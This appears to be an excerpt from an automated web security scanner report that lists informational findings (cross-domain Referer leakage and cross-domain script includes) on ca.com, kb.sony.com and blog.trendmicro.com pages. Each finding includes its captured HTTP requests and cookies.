</a>...[SNIP]... <img class="dr_cart_details_overlay_boxshot" align="left" alt="Extended Download Service" src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/pixel.gif" border="0"/> _overlay_description">...[SNIP]... );" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" onClick="javascript:processPage();q=false;" alt="Continue" /> </a>...[SNIP]... ;margin-top:-30px;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif" border="0" /> ...[SNIP]... =ContinueShopping&SiteID=tmamer&Locale=en_US&Env=BASE" onClick="q=false"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/sc_continueshopping_en_US.gif" /> </a>...[SNIP]... );" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" /> </a>...[SNIP]... );" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" /> </a>...[SNIP]... <img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" align="right" alt="Close Window" border="0"/> </a>...[SNIP]... _US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"> </a>...[SNIP]... <img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif" alt="Print"/> </a>...[SNIP]... <script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"> ...[SNIP]... ############## --><script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"> </script>...[SNIP]...
12.8. https://www.ca.com/us/register/createprofile.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/createprofile.aspx
Issue detail
The page was loaded from a URL containing a query string:https://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspx https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css https://secure.addthis.com/js/250/addthis_widget.js
Request
GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .css" rel="stylesheet" type="text/css" media="screen" />--><link href="https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css" rel="stylesheet" type="text/css"/> ...[SNIP]... -global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
12.9. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page was loaded from a URL containing a query string:https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css https://secure.addthis.com/js/250/addthis_widget.js
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .css" rel="stylesheet" type="text/css" media="screen" />--><link href="https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css" rel="stylesheet" type="text/css"/> ...[SNIP]... -global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
12.10. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_appFooter.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 http://www.learningcenter.sony.us/home.php
Request
GET /selfservice/common/viewdocument_appFooter.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK/kanisa.css" type="text/css" rel="stylesheet">...[SNIP]... <A onmouseover=" window.status='Learn about the latest Sony products at the Learning Center.'; return true" onmouseout="window.status=' '; return true" href="http://www.learningcenter.sony.us/home.php" target=_blank> Learning Center</A>...[SNIP]...
12.11. http://www.kb.sony.com/selfservice/microsites/search.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/microsites/search.do
Issue detail
The page was loaded from a URL containing a query string:http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
Request
GET /selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 HTTP/1.1/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"}}
Response
HTTP/1.1 200 OK/html4/frameset.dtd">...[SNIP]... <a href="http://mozilla.org"> http://mozilla.org</a>...[SNIP]...
12.12. http://www.kb.sony.com/selfservice/microsites/searchEntry.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/microsites/searchEntry.do
Issue detail
The page was loaded from a URL containing a query string:http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US http://www.learningcenter.sony.us/home.php
Request
GET /selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US HTTP/1.1/US/perl/index.pl/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353067536
Response
HTTP/1.1 200 OK/html4/strict.dtd">...[SNIP]... <A onmouseover=" window.status='Learn about the latest Sony products at the Learning Center.'; return true" onmouseout="window.status=' '; return true" href="http://www.learningcenter.sony.us/home.php" target=_blank> Learning Center</A>...[SNIP]...
13. Cross-domain script include
previous
next
There are 21 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
13.1. http://blog.trendmicro.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://widgets.twimg.com/j/2/widget.js
Request
GET /?p=12640 HTTP/1.1/us/search/?q=xss&search.x=2&search.y=10&search=search/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK.com/xmlrpc.php.com/12640>; rel=shortlink.com/?p=12640>; rel=shortlink/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" ...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.2. http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/a-snapshot-of-android-threats-infographic/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://widgets.twimg.com/j/2/widget.js
Request
GET /a-snapshot-of-android-threats-infographic/ HTTP/1.1.com/?p=12640/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.1.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=1; bn_u=6923713914570485926; CMAVID=50021315153052143970353; cmRS=&t1=1315350993766&t2=-1&t3=1315350994638<i=1315350994637&ln=&hr=/a-snapshot-of-android-threats-infographic/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/%3Fp%3D12640&rf=http%3A//us.trendmicro.com/us/search/%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22t%22%3A1315350994642%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fa-snapshot-of-android-threats-infographic%2F%22%2C%22l%22%3A%22A%20Snapshot%20of%20Android%20Threats%20%5BINFOGRAPHIC%5D%22%2C%22de%22%3A%7B%22su%22%3A%22XSS%20(Cross-Site%20Scripting)%20Very%20Much%20Alive%20and%20Kicking%20We%20were%20about%20to%20investigate%20further%20on%20malicious%20activities%20related%20to%20banner82(dot)com%2Fb.js%20but%20the%22%2C%22ti%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22nw%22%3A1098%2C%22nl%22%3A107%7D%7D
Response
HTTP/1.1 200 OK.com/xmlrpc.php.com/36257>; rel=shortlink.com/?p=36257>; rel=shortlink/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" ...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.3. http://blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/blackhat-2011-dangers-of-embedded-web-servers/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://widgets.twimg.com/j/2/widget.js
Request
GET /blackhat-2011-dangers-of-embedded-web-servers/ HTTP/1.1.com/?s=xss&Submit=+Go+/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.4.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=4; bn_u=6923713914570485926; cmRS=&t1=1315351014612&t2=-1&t3=1315351015662&t4=1315351013744<i=1315351015662&ln=&hr=/blackhat-2011-dangers-of-embedded-web-servers/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/%3Fs%3Dxss%26Submit%3D+Go+&rf=http%3A//blog.trendmicro.com/category/exploits/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fs%3Dxss%26Submit%3D%2BGo%2B%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22t%22%3A1315351015665%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fblackhat-2011-dangers-of-embedded-web-servers%2F%22%2C%22l%22%3A%22Blackhat%202011%3A%20Dangers%20of%20Embedded%20Web%20Servers%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20results%20for%3A%20Xss%20%7C%20TrendLabs%20%7C%20Malware%20Blog%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A513%2C%22nl%22%3A120%7D%7D
Response
HTTP/1.1 200 OK.com/xmlrpc.php.com/36136>; rel=shortlink.com/?p=36136>; rel=shortlink/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" ...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.4. http://blog.trendmicro.com/category/exploits/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/category/exploits/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://widgets.twimg.com/j/2/widget.js
Request
GET /category/exploits/ HTTP/1.1.com/a-snapshot-of-android-threats-infographic//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.2.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=2; bn_u=6923713914570485926; cmRS=&t1=1315350998493&t2=1315351000572&t3=1315351002621&t4=1315350994638<i=1315351002613&ln=&hr=/category/exploits/&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/a-snapshot-of-android-threats-infographic/&rf=http%3A//blog.trendmicro.com/%3Fp%3D12640; 